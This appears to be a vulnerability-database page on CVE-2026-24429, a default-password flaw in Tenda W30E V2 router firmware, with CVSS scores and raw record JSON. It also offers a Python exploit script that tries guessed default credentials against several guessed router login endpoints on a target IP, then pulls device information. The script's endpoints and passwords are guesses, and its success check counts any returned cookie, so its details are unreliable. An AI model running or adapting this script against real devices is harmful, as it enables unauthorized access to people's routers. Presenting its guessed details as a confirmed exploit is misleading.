Security Vulnerability Report
中文
CVE-2026-24429 CVSS 9.8 CRITICAL

CVE-2026-24429

Published: 2026-01-26 18:16:40
Last Modified: 2026-01-29 13:01:22
Source: [email protected]

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda W30E V2 固件版本 <= V16.01.0.19(5037)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-24429 - Tenda W30E V2 Hardcoded Default Password PoC This PoC demonstrates authentication bypass using hardcoded default credentials. WARNING: For authorized security testing only. """ import requests import sys from urllib.parse import urljoin def exploit_tenda_default_credentials(target_ip, default_user="admin", default_pass="password"): """ Attempt to authenticate to Tenda W30E V2 using hardcoded default credentials. Args: target_ip: Target router IP address default_user: Default username (typically 'admin') default_pass: Default password (often blank or 'password') Returns: bool: True if authentication successful, False otherwise """ target_url = f"http://{target_ip}" # Common Tenda W30E V2 authentication endpoints auth_endpoints = [ "/login/Auth", "/cgi-bin/login.cgi", "/admin/login.cgi", "/api/system/login" ] # Authentication payloads (may vary by firmware version) auth_payloads = [ {"username": default_user, "password": default_pass}, {"username": default_user, "password": ""}, {"username": "admin", "password": "admin"}, {"user": default_user, "pass": default_pass}, ] for endpoint in auth_endpoints: for payload in auth_payloads: try: response = requests.post( urljoin(target_url, endpoint), data=payload, timeout=10, verify=False ) # Check for successful authentication indicators if response.status_code == 200: if "success" in response.text.lower() or "token" in response.text.lower(): print(f"[+] SUCCESS: Authenticated via {endpoint}") print(f"[+] Payload used: {payload}") print(f"[+] Response: {response.text[:200]}") return True # Try to extract session cookie/token if response.cookies: print(f"[*] Received cookies from {endpoint}: {response.cookies}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") continue print("[-] Failed to authenticate with default credentials") return False def check_device_info(target_ip): """Check device information after successful authentication.""" endpoints = [ "/cgi-bin/DevInfoShow", "/api/system/deviceinfo", "/cgi-bin/StatusLan" ] for endpoint in endpoints: try: response = requests.get( urljoin(f"http://{target_ip}", endpoint), timeout=10 ) if response.status_code == 200: print(f"\n[+] Device info from {endpoint}:") print(response.text) except: continue if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-24429.py <target_ip>") print("Example: python cve-2026-24429.py 192.168.0.1") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] Exploiting CVE-2026-24429: Tenda W30E V2 Hardcoded Default Password\n") if exploit_tenda_default_credentials(target): print("\n[*] Extracting device information...") check_device_info(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24429", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.267", "lastModified": "2026-01-29T13:01:22.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo la V16.01.0.19(5037) se envían con una contraseña predefinida por defecto para una cuenta de autenticación integrada que no es necesario cambiar durante la configuración inicial. Un atacante puede aprovechar estas credenciales por defecto para obtener acceso autenticado a la interfaz de gestión."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1393"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:*", "matchCriteriaId": "02FBE634-0D3F-4439-B4A6-F427C82967C7"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-hardcoded-default-password-for-built-in-account", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.